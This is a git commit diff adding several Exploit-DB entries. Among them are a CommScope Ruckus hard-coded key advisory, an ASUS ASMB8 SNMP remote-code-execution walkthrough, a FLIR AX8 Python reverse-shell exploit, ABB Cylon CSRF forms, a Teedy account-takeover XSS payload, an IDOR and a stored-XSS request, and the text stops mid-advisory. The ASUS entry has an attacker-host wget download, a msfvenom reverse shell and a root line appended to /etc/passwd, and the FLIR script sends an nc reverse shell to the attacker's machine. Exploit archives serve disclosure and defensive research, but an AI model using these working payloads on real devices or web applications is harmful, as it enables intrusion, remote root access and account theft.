Merge remote-tracking branch 'exploitdb/main'
This commit is contained in:
commit
682b78fb31
24 changed files with 1845 additions and 1 deletions
110
exploits/hardware/local/52242.txt
Normal file
110
exploits/hardware/local/52242.txt
Normal file
|
@ -0,0 +1,110 @@
|
|||
# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
|
||||
# Date: 2021.05.26
|
||||
# Exploit Author: korelogic
|
||||
# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
|
||||
# Affected Product: Ruckus IoT Controller
|
||||
# Version: 1.7.1.0 and earlier
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2021-33216,CVE-2019-1000018
|
||||
|
||||
|
||||
KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
|
||||
Advisory ID: KL-001-2021-007
|
||||
Publication Date: 2021.05.26
|
||||
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
|
||||
1. Vulnerability Details
|
||||
Affected Vendor: CommScope
|
||||
Affected Product: Ruckus IoT Controller
|
||||
Affected Version: 1.7.1.0 and earlier
|
||||
Platform: Linux
|
||||
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
|
||||
CVE ID: CVE-2021-33216
|
||||
2. Vulnerability Description
|
||||
An upgrade account is included in the IoT Controller OVA that
|
||||
provides the vendor undocumented access via Secure Copy (SCP).
|
||||
3. Technical Description
|
||||
Once the OVA is imported into VirtualBox, a VMDK file is
|
||||
created. The VMDK file can be mounted and the directory
|
||||
structure and its contents can be perused.
|
||||
An authorized_keys file exists that allows an
|
||||
individual/organization possessing the SSH private key to
|
||||
access the virtual appliance using the 'vriotiotupgrade'
|
||||
account. The 'vriotiotupgrade' account is restricted to scp,
|
||||
per the rssh configuration.
|
||||
Additionally, it appears that the IoT Controller has rssh version 2.3.4
|
||||
installed and in use. At the time of this advisory, there are at least
|
||||
three remote command injection vulnerabilities in this particular version
|
||||
of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
|
||||
4. Mitigation and Remediation Recommendation
|
||||
The vendor has released an updated firmware (1.8.0.0) which
|
||||
remediates the described vulnerability. Firmware and release
|
||||
notes are available at:
|
||||
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
|
||||
5. Credit
|
||||
This vulnerability was discovered by Jim Becher (@jimbecher)
|
||||
of KoreLogic, Inc.
|
||||
6. Disclosure Timeline
|
||||
2021.03.30 - KoreLogic submits vulnerability details to
|
||||
CommScope.
|
||||
2021.03.30 - CommScope acknowledges receipt and the intention
|
||||
to investigate.
|
||||
2021.04.06 - CommScope notifies KoreLogic that this issue,
|
||||
along with several others reported by KoreLogic,
|
||||
will require more than the standard 45 business
|
||||
day remediation timeline.
|
||||
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
|
||||
necessary.
|
||||
2021.04.30 - CommScope informs KoreLogic that remediation for
|
||||
this vulnerability will be available inside of the
|
||||
standard 45 business day timeline. Requests
|
||||
KoreLogic acquire CVE number for this
|
||||
vulnerability.
|
||||
2021.05.14 - 30 business days have elapsed since the
|
||||
vulnerability was reported to CommScope.
|
||||
2021.05.17 - CommScope notifies KoreLogic that the patched
|
||||
version of the firmware will be available the week
|
||||
of 2021.05.24.
|
||||
2021.05.19 - KoreLogic requests CVE from MITRE.
|
||||
2021.05.19 - MITRE issues CVE-2021-33216.
|
||||
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
|
||||
advisory.
|
||||
2021.05.26 - KoreLogic public disclosure.
|
||||
7. Proof of Concept
|
||||
With the VMDK file mounted at the current working directory:
|
||||
$ find . -name authorized_keys
|
||||
./VRIOT/ap-images/authorized_keys
|
||||
./VRIOT/ops/ap-images/authorized_keys
|
||||
$ cat VRIOT/ap-images/authorized_keys
|
||||
ssh-rsa
|
||||
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
|
||||
chandini.venkatesh@commscope.com
|
||||
$ cat VRIOT/ops/ap-images/authorized_keys
|
||||
ssh-rsa
|
||||
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
|
||||
chandini.venkatesh@commscope.com
|
||||
$ grep "ap-images" etc/passwd
|
||||
vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
|
||||
$ tail -8 etc/ssh/sshd_config
|
||||
Match User vriotiotupgrade
|
||||
PasswordAuthentication no
|
||||
AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
|
||||
Match User vriotha
|
||||
PasswordAuthentication yes
|
||||
$ grep -v ^# etc/rssh.conf
|
||||
logfacility = LOG_USER
|
||||
allowscp
|
||||
umask = 022
|
||||
The contents of this advisory are copyright(c) 2021
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
|
61
exploits/hardware/local/52244.txt
Normal file
61
exploits/hardware/local/52244.txt
Normal file
|
@ -0,0 +1,61 @@
|
|||
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
|
||||
# Date: 2023-02-16
|
||||
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
|
||||
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
|
||||
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
|
||||
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
|
||||
# CVE: CVE-2023-26602
|
||||
|
||||
++++++++++++++++++++
|
||||
0x00 DESCRIPTION
|
||||
++++++++++++++++++++
|
||||
During a recent engagement, a remote server management interface has been
|
||||
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
|
||||
access to the private community, subsequently allowing us to introduce
|
||||
SNMP arbitrary extensions to achieve RCE.
|
||||
We also found a hardcoded account sysadmin:superuser by cracking the
|
||||
shadow file (md5crypt) found on the system and identifed an "anonymous"
|
||||
user w/ the same password, however a lock seems to be in place to prevent
|
||||
using these credentials via SSH (running defshell as default shell).
|
||||
+++++++++++++++
|
||||
0x01 IMPACT
|
||||
+++++++++++++++
|
||||
By exploiting SNMP arbitrary extension, we are able to run any command on
|
||||
the system w/ root privileges, and we are able to introduce our own user
|
||||
circumventing the defshell restriction for SSH.
|
||||
+++++++++++++++++++++++++++++++
|
||||
0x02 PROOF OF CONCEPT (PoC)
|
||||
+++++++++++++++++++++++++++++++
|
||||
At first, we have to create required extensions on the system, e.g. via
|
||||
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
|
||||
and if everything is set, we can just run that command by
|
||||
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
|
||||
which will execute our defined command and show us its output.
|
||||
+++++++++++++++++++++++++++++++
|
||||
0x03 SSH Remote Root Access
|
||||
+++++++++++++++++++++++++++++++
|
||||
The identified RCE can be used to transfer a reverse tcp shell created
|
||||
by msfvenom for arm little-endian, e.g.
|
||||
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
|
||||
We can now transfer the binary, adjust permissions and finally run it:
|
||||
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
|
||||
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
|
||||
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
|
||||
Again, we have to request execution of the lines in the MIB via:
|
||||
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
|
||||
We get a reverse connection from the host, and can now act on the local system
|
||||
to easily echo our own line into /etc/passwd:
|
||||
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
|
||||
By setting the standard shell to /bin/sh, we are able to get a SSH root
|
||||
shell into the system, effectively circumventing the defshell restriction.
|
||||
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
|
||||
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
|
||||
Enter 'help' for a list of built-in commands.
|
||||
# uname -a
|
||||
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
|
||||
# uptime
|
||||
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
|
||||
# head -n 1 /etc/shadow
|
||||
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
|
||||
---
|
||||
#EOF
|
171
exploits/hardware/remote/52246.py
Executable file
171
exploits/hardware/remote/52246.py
Executable file
File diff suppressed because one or more lines are too long
82
exploits/hardware/webapps/52240.py
Executable file
82
exploits/hardware/webapps/52240.py
Executable file
|
@ -0,0 +1,82 @@
|
|||
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
|
||||
# Date: 8/19/2022
|
||||
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
|
||||
# Vendor Homepage: https://www.flir.com/
|
||||
# Software Link: https://www.flir.com/products/ax8-automation/
|
||||
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
|
||||
# Version: 1.46.16 and under.
|
||||
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
|
||||
# CVE : CVE-2022-37061
|
||||
|
||||
from __future__ import print_function, unicode_literals
|
||||
from bs4 import BeautifulSoup
|
||||
import argparse
|
||||
import requests
|
||||
import json
|
||||
import urllib3
|
||||
|
||||
urllib3.disable_warnings()
|
||||
|
||||
def banner():
|
||||
flirLogo = """
|
||||
███████╗██╗ ██╗██████╗
|
||||
██╔════╝██║ ██║██╔══██╗
|
||||
█████╗ ██║ ██║██████╔╝
|
||||
██╔══╝ ██║ ██║██╔══██╗
|
||||
██║ ███████╗██║██║ ██║
|
||||
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
|
||||
.---------------------.
|
||||
█████╗ ██╗ ██╗ █████╗ /--'--.------.--------/|
|
||||
██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||
|
||||
███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||
|
||||
██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| ||
|
||||
██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/
|
||||
╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------`
|
||||
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
|
||||
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
|
||||
FOR EDUCATIONAL PURPOSE ONLY.
|
||||
"""
|
||||
return print('\033[1;94m{}\033[1;m'.format(flirLogo))
|
||||
|
||||
def pingWebInterface(RHOST, RPORT):
|
||||
url = 'http://{}:{}/login/'.format(RHOST, RPORT)
|
||||
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
|
||||
try:
|
||||
if response.status_code != 200:
|
||||
print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
|
||||
exit()
|
||||
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
|
||||
version = soup.find('p', id='login-title').string
|
||||
print('[INFO] {} detected.'.format(version))
|
||||
except:
|
||||
print('[ERROR] Can\'t grab the device version...')
|
||||
|
||||
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
|
||||
url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
|
||||
payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)
|
||||
data = 'action=alarm&id=2;{}'.format(payload)
|
||||
headers = {
|
||||
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
|
||||
}
|
||||
try:
|
||||
print('[INFO] Executing reverse shell...')
|
||||
response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
|
||||
print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
|
||||
return
|
||||
except Exception as e:
|
||||
print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
|
||||
return False
|
||||
|
||||
def main():
|
||||
banner()
|
||||
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
|
||||
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
|
||||
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
|
||||
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
|
||||
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
|
||||
args = parser.parse_args()
|
||||
pingWebInterface(args.RHOST, args.RPORT)
|
||||
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
117
exploits/multiple/hardware/52231.html
Normal file
117
exploits/multiple/hardware/52231.html
Normal file
|
@ -0,0 +1,117 @@
|
|||
<html>
|
||||
<!--
|
||||
|
||||
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
|
||||
|
||||
|
||||
Vendor: ABB Ltd.
|
||||
Product web page: https://www.global.abb
|
||||
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=3.08.02
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB BMS/BAS controller allows users to perform certain actions
|
||||
via HTTP requests without performing any validity checks to verify the
|
||||
requests. This can be exploited to perform certain actions with administrative
|
||||
privileges if a logged-in user visits a malicious web site.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2024-5870
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
|
||||
CVE ID: CVE-2024-48846
|
||||
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
-->
|
||||
|
||||
|
||||
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
|
||||
// Add User/Admin
|
||||
<body>
|
||||
<form action="http://192.168.73.31/userManagement.php" method="POST">
|
||||
<input type="hidden" name="USER" value="zeroscience" />
|
||||
<input type="hidden" name="PASSWORD" value="ZSL251" />
|
||||
<input type="hidden" name="ACTION" value="Add" />
|
||||
<input type="submit" value="Make me a prince! (php)" />
|
||||
</form>
|
||||
</body>
|
||||
|
||||
|
||||
// Add User/Admin
|
||||
<body>
|
||||
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
|
||||
<input type="hidden" name="newuser" value="test" />
|
||||
<input type="hidden" name="password" value="test123" />
|
||||
<input type="hidden" name="passwordConfirm" value="test123" />
|
||||
<input type="hidden" name="Insert" value="Add" />
|
||||
<input type="submit" value="Make me a prince! (java)" />
|
||||
</form>
|
||||
</body>
|
||||
|
||||
|
||||
// Delete User/Admin
|
||||
<body>
|
||||
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
|
||||
<input type="hidden" name="user9" value="test" />
|
||||
<input type="hidden" name="remove9" value="1" />
|
||||
<input type="hidden" name="totalRows" value="9" />
|
||||
<input type="hidden" name="Delete" value="Delete" />
|
||||
<input type="submit" value="Destr0y" />
|
||||
</form>
|
||||
</body>
|
||||
|
||||
</html>
|
56
exploits/multiple/webapps/52228.txt
Normal file
56
exploits/multiple/webapps/52228.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
|
||||
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
|
||||
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
|
||||
# Vendor Homepage: https://teedy.io/
|
||||
# Software Link: https://github.com/Tomblib0/Teedy
|
||||
# Version: 1.11
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2024-46278
|
||||
|
||||
There is a vulnerability that causes XSS when downloading files.
|
||||
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
|
||||
|
||||
|
||||
Login as an attacker’s account.
|
||||
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
|
||||
|
||||
```
|
||||
<script>
|
||||
const currentCookie = document.cookie;
|
||||
|
||||
const requestOptions = {
|
||||
method: 'POST',
|
||||
headers: {
|
||||
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
|
||||
'Accept': 'application/json, text/plain, */*',
|
||||
'Cookie': currentCookie,
|
||||
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
|
||||
'sec-ch-ua-mobile': '?0',
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
|
||||
'sec-ch-ua-platform': '"Linux"',
|
||||
'Origin': 'http://localhost:8080',
|
||||
'Sec-Fetch-Site': 'same-origin',
|
||||
'Sec-Fetch-Mode': 'cors',
|
||||
'Sec-Fetch-Dest': 'empty',
|
||||
'Referer': 'http://localhost:8080/',
|
||||
'Accept-Encoding': 'gzip, deflate, br',
|
||||
'Accept-Language': 'en-US,en;q=0.9'
|
||||
},
|
||||
body: 'password=superSecure2&passwordconfirm=superSecure2'
|
||||
};
|
||||
|
||||
fetch('http://localhost:8080/api/user', requestOptions)
|
||||
.then(response => {
|
||||
if (!response.ok) {
|
||||
throw new Error('Network response was not ok');
|
||||
}
|
||||
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
|
||||
return response.json();
|
||||
})
|
||||
.then(data => console.log(data))
|
||||
.catch(error => console.error('There was a problem with your fetch operation:', error));
|
||||
</script>
|
||||
```
|
||||
|
||||
Login with another account. eg. admin
|
||||
Click on the file uploaded by the attacker and select Download this file.
|
24
exploits/multiple/webapps/52236.txt
Normal file
24
exploits/multiple/webapps/52236.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
|
||||
# Date: 19/07/2018
|
||||
# Exploit Author: S. M. Zia Ur Rashid, SC
|
||||
# Author Contact: https://www.linkedin.com/in/ziaurrashid/
|
||||
# Vendor Homepage: http://proconf.org & http://myproconf.org
|
||||
# Version: <= 6.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2018-16606
|
||||
# Patched Version: 6.1
|
||||
|
||||
# Description:
|
||||
In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows
|
||||
any author to view and grab all submitted papers (Title and Abstract) and
|
||||
their authors' personal information (Name, Email, Organization, and
|
||||
Position) by changing the value of Paper ID (the pid parameter).
|
||||
|
||||
# PROOF-OF-CONCEPT
|
||||
Step 1: Sign In as an author for a conference & submit a paper. Youall get
|
||||
a paper ID.
|
||||
Step 2: Now go to paper details and change the value of Paper ID (param
|
||||
pid=xxxx) to nearest previous value to view others submitted paper &
|
||||
authors information.
|
||||
http:// <http:>
|
||||
[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
|
37
exploits/multiple/webapps/52238.txt
Normal file
37
exploits/multiple/webapps/52238.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
|
||||
# Date: 18-09-2022
|
||||
# Exploit Author: Sam Wallace, SC
|
||||
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
|
||||
# Version: 1.0
|
||||
# Tested on: Debian
|
||||
# CVE : CVE-2022-41358
|
||||
|
||||
Summary:
|
||||
Garage Management System utilizes client side validation to prevent XSS.
|
||||
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
|
||||
Parameter: categoriesName
|
||||
URI: /garage/php_action/createCategories.php
|
||||
POC:
|
||||
POST /garage/php_action/createCategories.php HTTP/1.1
|
||||
Host: 10.24.0.69
|
||||
Content-Length: 367
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://10.24.0.69
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://10.24.0.69/garage/add-category.php
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
|
||||
Connection: close
|
||||
------WebKitFormBoundaryqKDsN4gmatTEEkhS
|
||||
Content-Disposition: form-data; name="categoriesName"
|
||||
<script>alert(1)</script>
|
||||
------WebKitFormBoundaryqKDsN4gmatTEEkhS
|
||||
Content-Disposition: form-data; name="categoriesStatus"
|
||||
1
|
||||
------WebKitFormBoundaryqKDsN4gmatTEEkhS
|
||||
Content-Disposition: form-data; name="create"
|
||||
------WebKitFormBoundaryqKDsN4gmatTEEkhS--
|
137
exploits/multiple/webapps/52241.txt
Normal file
137
exploits/multiple/webapps/52241.txt
Normal file
|
@ -0,0 +1,137 @@
|
|||
# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
|
||||
# Date: 2022.01.26
|
||||
# Exploit Author: Steffen Rogge, SC
|
||||
# Vendor Homepage: https://github.com/ethercreative/logs
|
||||
# Software Link: https://plugins.craftcms.com/logs
|
||||
# Version: <=3.0.3
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2022-23409
|
||||
|
||||
product: Ethercreative Logs plugin for Craft CMS
|
||||
fixed version: >=3.0.4
|
||||
impact: Medium
|
||||
found: 2021-07-06
|
||||
SEC Consult Vulnerability Lab
|
||||
An integrated part of SEC Consult, an Atos company
|
||||
Europe | Asia | North America
|
||||
https://www.sec-consult.com
|
||||
=======================================================================
|
||||
Vendor description:
|
||||
-------------------
|
||||
"A quick and dirty way to access your logs from inside the CP"
|
||||
As found on the plugin store page: https://plugins.craftcms.com/logs
|
||||
Active Installs 4,093 (as of 2021-07-07)
|
||||
Business recommendation:
|
||||
------------------------
|
||||
The vendor provides a patched version v3.0.4 which should be installed immediately.
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
